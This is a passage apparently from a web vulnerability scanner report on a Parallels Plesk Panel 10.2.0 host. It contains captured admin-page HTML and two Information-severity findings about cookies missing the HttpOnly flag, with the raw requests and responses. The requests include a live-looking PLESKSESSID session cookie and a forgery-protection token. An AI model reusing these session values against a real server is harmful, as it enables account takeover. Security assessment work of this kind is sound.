items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Add New ODBC DSN</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/odbc_dsn_add/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/odbc/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

function new_dsn(f)
{
   if (f.name.value == "") {
       alert("Enter DSN name");
       f.name.focus();
       return false;
   }
   if (!chk_dsn_name(f.name.value)) {
       alert("Wrong syntax for ODBC connection name (): please use only alphanumeric symbols.");
       f.name.select();
       f.name.focus();
       return false;
   }
   f.cmd.value = "update";
   lsubmit(f);
   return false;
}

// forbidden characters for dsn name: []{}(),;?*=!@
function chk_dsn_name(name) { return name.search(/^[A-Za-z0-9\-\_'\"\<\>\/\.\|\~\#\$\%\^\&]*$/) != -1; }

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/odbc/dsn@new/properties/" method="post" enctype="multipart/form-data" >

   <div class="formArea">
       <fieldset>

   <legend>Add new DSN connection</legend><table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>
   
   <table class="formFields" cellspacing="0" width="100%">
       <tr >
           <td class="name"><label for="fid-dsn_name">Connection name</label>&nbsp;<span class="required">*</span></td>
           <td><input type="text" name="name" id="fid-dsn_name" value="" size="13" maxlength="32"></td>
       </tr>
       <tr >
           <td class="name"><label for="fid-dsn_desc">Connection description</label></td>
           <td><input type="text" name="description" id="fid-dsn_desc" value="" size="13" maxlength="32"></td>
       </tr>
       <tr >
           <td class="name"><label for="fid-dsn_driver">Driver</label></td>
           <td><select name="driver" id="fid-driver" >    <option value='SQL Server'>SQL Server</option>
   <option value='Microsoft Access Driver (*.mdb)'>Microsoft Access Driver (*.mdb)</option>
   <option value='MySQL ODBC 3.51 Driver'>MySQL ODBC 3.51 Driver</option>
   <option value='Microsoft Excel Driver (*.xls)'>Microsoft Excel Driver (*.xls)</option>
</select>
</td>
       </tr>
   </table>
   
</td></tr></table></fieldset>
   </div>

   <div class="formArea">
       <table width="100%" class="buttons" cellspacing="0" cellpadding="0"><tr>
           <td class="main" width="0"></td>
           <td class="footnote" id="footnote"><span class="required">*</span> Required fields</td>
           <td class="misc" width="0"><nobr><DIV class="commonButton" id="bid-ok" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Apply all changes.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);return new_dsn(document.forms[0]);return false;" style=""><BUTTON name="bname_ok" id="buttonid-ok" type="button" onClick="Event.stop(event);return new_dsn(document.forms[0]);return false;">OK</BUTTON><SPAN id="spanid-ok">OK</SPAN></DIV><DIV class="commonButton" id="bid-cancel" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Discard any changes and return to the previous page.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;" style=""><BUTTON name="bname_cancel" id="buttonid-cancel" type="button" onClick="Event.stop(event);lon();go_to(&#039;/plesk/client@2/domain@1/odbc/&#039;); return false;">Cancel</BUTTON><SPAN id="spanid-cancel">Cancel</SPAN></DIV></nobr></td>
       </tr></table>

<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
       <input type="hidden" name="cmd" value="update">
       <input type="hidden" name="lock" value="false">
       <input type="hidden" name="previous_page" value="">
       <input type="hidden" name="wizstep" value="1"><input type="hidden" name="wizard" value="/plesk/client@2/domain@1/odbc/dsn@new/properties/"><input type="hidden" name="wizaction">

   </div>

</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.34. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/domain@1/traffic-hosting  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/domain@1/traffic-hosting

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/domain@1/traffic-hosting HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: domainaliaseslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 19:15:03 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 19:15:02 GMT
Connection: close
Content-Length: 24895

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%2F%3Fdst%3D%252Fplesk%252Fclient%25402%252Fdomain%25401%252Ftraffic-hosting%26src%3D%252Fsmb%252Fstatistics%26srcController%3DStatisticsController' + '&activeModule=' + 'statistics' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"active","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>Data Transfer Statistics for Subscription vulnerable.host.fqdn</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/client.domain.traffic-hosting/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/hosting-panel=statistics.index/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;

</script>

<script type="text/javascript">
Event.observe(window, 'load', function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: []
});
});
</script>

<div class="screenBody" id="">
<div id="warnings"></div>


<form action="/plesk/client@2/domain@1/traffic-hosting" method="post" enctype="multipart/form-data" >
   <input type="text" name="iesingletextinputworkaround" disabled style="display: none">
<input type="hidden" name="forgery_protection_token" value="dc1721730e046f7e1de14c19e4a424be">
   <input type="hidden" name="cmd" value="update">
   <input type="hidden" name="lock" value="false">
   <input type="hidden" name="previous_page" value="">
   <input type="hidden" name="wizaction">

   <div class="listArea">
   <fieldset>
       <legend>Data transfer by services</legend>
       <table width="100%" cellspacing="0" cellpadding="0" border="0"><tr><td>
       <script>
       function change_period_oC(f, new_date)
       {
           f.date.value = new_date;
           f.cmd.value = "changePeriod";
           lsubmit(f);

           return false;
       }
       </script><div id="DomainTrafficListSearch" class="actions-box show"><table width="100%" cellspacing="0" class="buttons"><tr><td class="main"><div><input type="hidden" name="date" value="1304226000"><select name="date_selector" onChange="change_period_oC(document.forms[0], this.value); return false;"><option value="1304226000" SELECTED>May 2011 (0 B)</option></select></div></td><td class="misc"><div id="DomainTrafficListSearchControl" class="show"><DIV class="commonButton" id="bid-search-show" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to show search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DomainTrafficListSearchShow();;return false;" style=""><BUTTON name="bname_search_show" id="buttonid-search-show" type="button" onClick="Event.stop(event);DomainTrafficListSearchShow();;return false;">Show Search</BUTTON><SPAN id="spanid-search-show">Show Search</SPAN></DIV><DIV class="commonButton" id="bid-search-hide" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Click to hide search area.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DomainTrafficListSearchHide();;return false;" style=""><BUTTON name="bname_search_hide" id="buttonid-search-hide" type="button" onClick="Event.stop(event);DomainTrafficListSearchHide();;return false;">Hide Search</BUTTON><SPAN id="spanid-search-hide">Hide Search</SPAN></DIV></div></td></tr></table><table width="100%" cellspacing="0" class="searchArea buttons"><tr><td class="main"><div>
<table border="0" cellpadding="0" cellspacing="0">
   <tr>
       <td>Name</td>
       <td>&nbsp;</td>
   </tr><tr>
       <td><input type="text" name="filter" id="searchInput" value="" size="20" maxlength="245"></td>
       <td>
           <DIV class="commonButton" id="bid-search" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Enter a search pattern and click to find services.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DomainTrafficListFilter(document.forms[0]);return false;" style=""><BUTTON name="bname_search" id="buttonid-search" type="submit" onClick="Event.stop(event);DomainTrafficListFilter(document.forms[0]);return false;">Search</BUTTON><SPAN id="spanid-search">Search</SPAN><INPUT type="image" style="border: 0pt none ; height: 0pt; width: 0pt; position: absolute; left: -9999px;" src="/skins/default/plesk/images/1x1.gif"></DIV><DIV class="commonButton" id="bid-show-all" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Show all services.&quot;&#125;]);" onMouseOut="tooltip.hide();" onClick="Event.stop(event);DomainTrafficListShowAll(document.forms[0]);return false;" style=""><BUTTON name="bname_show_all" id="buttonid-show-all" type="button" onClick="Event.stop(event);DomainTrafficListShowAll(document.forms[0]);return false;">Reset Search</BUTTON><SPAN id="spanid-show-all">Reset Search</SPAN></DIV>
       </td>
   </tr>
</table></div></td></tr></table></div><div class="paging pagingTop"><input type="hidden" name="page" value ="0"><input type="hidden" name="page_size" value ="25"><table width="100%"><tr><td>4 Services total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="DomainTrafficListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="DomainTrafficListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="DomainTrafficListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><input type="hidden" name="sort" value="name"><table width="100%" cellspacing="0" class="list"><tr class="oddrowbg"><td><strong>Total amount for the subscription</strong></td><td><div class="number"><strong>Used</strong></div></td><td><div class="number"><strong>Limit</strong></div></td><td><div class="number"><strong>Available</strong></div></td><td colspan="2"><div class="number"><strong>Used</strong> (in %)</div></td></tr><tr class="oddrowbg"><td>vulnerable.host.fqdn</td><td><div class="number">0.00 MB</div></td><td><div class="number">100 GB/month</div></td><td><div class="number">100 GB/month</div></td><td width="5%"><div class="number">0%</div></td><td><DIV class="gaugeWrapper f-1" title="0% used, 100% free"><DIV class="gaugeContainer"><DIV class="gaugeFilled" style="width: 0%;"><I class="d1"></I><I class="d2"></I><I class="d3"></I><I class="d4"></I><I class="d5"></I><I class="d6"></I><I class="d7"></I><I class="d8"></I><I class="d9"></I></DIV></DIV></DIV></td></tr><TR><th width="50%" class="sort"><A href="#" onClick="DomainTrafficListSort(&#039;name_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort services by name.&quot;&#125;]);" onMouseOut="tooltip.hide();">Service</a><img src="/skins/default/plesk/icons/arrow_up.gif"></th><th width="10%" class="number"><A href="#" onClick="DomainTrafficListSort(&#039;used_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort services by total amount of traffic.&quot;&#125;]);" onMouseOut="tooltip.hide();">Used</a></th><th width="10%" class="number"><A href="#" onClick="DomainTrafficListSort(&#039;in_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort services by incoming traffic.&quot;&#125;]);" onMouseOut="tooltip.hide();">In</a></th><th width="10%" class="number"><A href="#" onClick="DomainTrafficListSort(&#039;out_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort services by outgoing traffic.&quot;&#125;]);" onMouseOut="tooltip.hide();">Out</a></th><th width="20%" colspan="2" class="number"><A href="#" onClick="DomainTrafficListSort(&#039;ubar_reverse&#039;); return false;" onMouseOver="tooltip.set(event, [&#123;&quot;type&quot;:&quot;string&quot;,&quot;string&quot;:&quot;Sort services by service traffic share in the total traffic at the domain.&quot;&#125;]);" onMouseOut="tooltip.hide();">% of All</a></th></TR><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>FTP</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number" width="5%">0%</td><td><DIV class="gaugeWrapper f-1" title="0% used, 100% free"><DIV class="gaugeContainer"><DIV class="gaugeFilled" style="width: 0%;"><I class="d1"></I><I class="d2"></I><I class="d3"></I><I class="d4"></I><I class="d5"></I><I class="d6"></I><I class="d7"></I><I class="d8"></I><I class="d9"></I></DIV></DIV></DIV></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td>HTTP</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number" width="5%">0%</td><td><DIV class="gaugeWrapper f-1" title="0% used, 100% free"><DIV class="gaugeContainer"><DIV class="gaugeFilled" style="width: 0%;"><I class="d1"></I><I class="d2"></I><I class="d3"></I><I class="d4"></I><I class="d5"></I><I class="d6"></I><I class="d7"></I><I class="d8"></I><I class="d9"></I></DIV></DIV></DIV></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td>POP3/IMAP</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number" width="5%">0%</td><td><DIV class="gaugeWrapper f-1" title="0% used, 100% free"><DIV class="gaugeContainer"><DIV class="gaugeFilled" style="width: 0%;"><I class="d1"></I><I class="d2"></I><I class="d3"></I><I class="d4"></I><I class="d5"></I><I class="d6"></I><I class="d7"></I><I class="d8"></I><I class="d9"></I></DIV></DIV></DIV></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td>SMTP</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number">0.00&nbsp;MB</td><td class="number" width="5%">0%</td><td><DIV class="gaugeWrapper f-1" title="0% used, 100% free"><DIV class="gaugeContainer"><DIV class="gaugeFilled" style="width: 0%;"><I class="d1"></I><I class="d2"></I><I class="d3"></I><I class="d4"></I><I class="d5"></I><I class="d6"></I><I class="d7"></I><I class="d8"></I><I class="d9"></I></DIV></DIV></DIV></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>4 Services total</td><td align="center"></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="DomainTrafficListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="DomainTrafficListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="DomainTrafficListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("domaintrafficlist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjthOjE6e3M6NDoibmFtZSI7czowOiIiO31zOjQ6InBhZ2UiO2k6MDtzOjg6InBhZ2VTaXplIjtpOjI1O30=");
           function DomainTrafficListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function DomainTrafficListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function DomainTrafficListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function DomainTrafficListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.DomainTrafficListSelectAll.checked;
                           DomainTrafficListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function DomainTrafficListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function DomainTrafficListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function DomainTrafficListFilter(f)
           {
               
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function DomainTrafficListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function DomainTrafficListSearchShow()
           {
               var sc = document.getElementById("DomainTrafficListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("DomainTrafficListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function DomainTrafficListSearchHide()
           {
               var sc = document.getElementById("DomainTrafficListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("DomainTrafficListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function DomainTrafficListRemove(f)
           {
               if (0 == DomainTrafficListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/traffic-hosting";
               lsubmit(f);
               return false;
           }
       </script>
       </td></tr></table>
   </fieldset>
</div>



</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

5.35. http://vulnerable.plesk.control.panel.20110407.20:8880/plesk/client@2/shared-ssl/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nosedivesailing.com:8880
Path:   /plesk/client@2/shared-ssl/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /plesk/client@2/shared-ssl/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a; locale=en-US; psaContext=dashboard

Response

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
